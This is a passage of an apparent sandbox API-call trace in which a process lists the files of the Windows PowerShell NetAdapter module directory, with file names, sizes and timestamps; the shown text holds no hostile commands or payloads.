nFileSizeHigh=0x0, nFileSizeLow=0x2701, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.cdxml", cAlternateFileName="")) returned 1 [0265.020] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.020] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.020] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.021] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.021] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.021] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2319, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.021] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.021] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.021] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe06, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.022] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.036] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.036] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc82, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.036] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.psd1", cAlternateFileName="")) returned 1 [0265.036] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.037] FindNextFileW (in: hFindFile=0x1a8db080, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb225, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter.Types.ps1xml", cAlternateFileName="")) returned 0 [0265.037] FindClose (in: hFindFile=0x1a8db080 | out: hFindFile=0x1a8db080) returned 1 [0265.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.037] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0265.037] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0265.037] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.038] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.039] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.cdxml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c25, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4100, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.040] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2005, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.cdxml", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.ps1xml", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.cdxml", cAlternateFileName="")) returned 1 [0265.041] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, 